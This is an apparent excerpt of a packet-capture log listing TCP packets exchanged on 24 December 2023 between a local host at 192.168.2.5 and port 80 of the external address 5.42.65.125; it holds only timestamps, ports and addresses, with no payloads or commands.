Dec 24, 2023 10:44:34.127559900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.127609968 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.128484011 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.128500938 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.128559113 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.128643036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.128684998 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.128727913 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.129321098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.129338980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.129415035 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.129419088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.129465103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.129508972 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.130278111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.130290985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.130341053 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.130352020 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.130367994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.130405903 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.131196976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.131313086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.131325960 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.131349087 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.131380081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.131530046 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.132299900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.132442951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.132457018 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.132493019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.132509947 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.132553101 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.133039951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.133074045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.133117914 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.133162975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.133197069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.133272886 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.134011984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.134114027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.134131908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.134171963 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.134227037 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.134284019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.134825945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.134891033 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.134941101 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.134996891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.135142088 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.135179996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.135888100 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.135937929 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.135981083 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.136027098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.136132002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.136194944 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.136959076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.136971951 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.136982918 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.136996031 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.137021065 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.137048006 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.137623072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.137728930 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.137831926 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.138118982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.138286114 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.138326883 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.138449907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.138549089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.138587952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.139070034 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.139131069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.139173985 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.139204979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.139236927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.139311075 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.139918089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.140115976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.140223980 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.140224934 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.140271902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.140306950 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.140866041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.140944958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.140980005 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.141041040 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.141098976 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.141156912 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.141813993 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.141885042 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.141922951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.141957045 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.142041922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.142079115 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.142699003 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.142785072 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.142798901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.142837048 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.142870903 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.143011093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.143785000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.143822908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.143874884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.144032955 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.144292116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.144341946 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.144635916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.144929886 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145015955 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.145073891 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145096064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145138025 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.145378113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145457983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145513058 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145524979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.145538092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.145586014 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.146348000 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.146361113 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.146401882 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.146454096 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.146516085 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.146583080 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.147290945 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.147412062 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.147429943 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.147474051 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.147479057 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.147686958 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.148228884 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.148355961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.148369074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.148392916 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.148436069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.148509026 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.148998022 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.149058104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.149261951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.149451017 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.149503946 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.149550915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.149596930 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.149624109 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.149666071 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.150377989 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.150489092 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.150574923 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.150587082 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.150623083 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.150649071 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.151350975 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.151417017 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.151462078 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.151470900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.151508093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.151593924 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.152435064 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.152501106 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.152580023 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.152621984 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.152662039 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.152740955 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.153091908 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.153135061 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.153179884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.153208971 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.153275967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.153316021 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.153894901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.153979063 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.154028893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.154053926 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.154150009 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.154190063 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.154803038 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.154875994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.154917955 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.154923916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.155040979 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.155685902 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.155731916 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.155860901 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.155925035 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.155967951 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.156040907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.156080961 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.156780958 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.156831980 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.156873941 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.156889915 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.156965017 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.157007933 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.157354116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.157434940 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.157480955 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.157484055 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.157521963 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.158271074 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.158308983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.158406019 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.158535957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.158564091 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.158725023 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.159176111 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.159188986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.159240961 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.159241915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.159285069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.159951925 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.160000086 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.160021067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.160413027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.160456896 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.160463095 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.160535097 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.160571098 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.160618067 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.160657883 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.161380053 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.161695004 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.161751986 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.161881924 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.162070990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.162107944 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.162118912 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.162164927 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.162211895 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.162250996 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.162281036 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.162990093 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.163034916 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.163083076 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.163163900 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.163203955 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.163245916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.163286924 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.163850069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.163980007 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164020061 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.164071083 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164103985 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164151907 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.164731026 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164748907 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164787054 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.164854050 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164951086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.164989948 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.165712118 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.165829897 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.165884972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.165939093 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.165971994 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.166419983 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.166438103 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.166471958 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.166493893 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.166558027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.166651964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.166693926 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.167232990 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.167339087 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.167357922 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.167397022 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.167411089 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.168028116 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.168076992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.168083906 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.168138027 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.168175936 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.168267012 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.168570042 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.169003010 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169059992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169111013 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.169116020 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169179916 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169240952 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.169754982 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169848919 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169943094 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169955969 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.169991016 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.170006037 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.170528889 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.170691967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.170747042 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.170891047 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.170978069 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.171025991 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.171077967 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.171127081 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.171170950 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.171777964 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.171863079 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.171983957 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.172028065 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.172075987 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.172619104 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.172672987 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.172693968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.172735929 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.172750950 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.172857046 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.172900915 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.173501968 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.173578024 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.173626900 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.173659086 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.173702002 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.174153090 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.174206972 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.174211979 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.174293041 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.174340963 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.174860001 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.174918890 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.175059080 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.175108910 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.175148964 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.175199986 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.175280094 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.175335884 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.175868988 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.175930023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.175985098 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.176029921 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.176052094 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.176573992 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.176626921 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.176634073 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.176671028 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.176702023 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.176832914 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.176876068 CET	49724	80	192.168.2.5	5.42.65.125
Dec 24, 2023 10:44:34.177401066 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.177464008 CET	80	49724	5.42.65.125	192.168.2.5
Dec 24, 2023 10:44:34.177510977 CET	49724	80	192.168.2.5	5.42.65.125
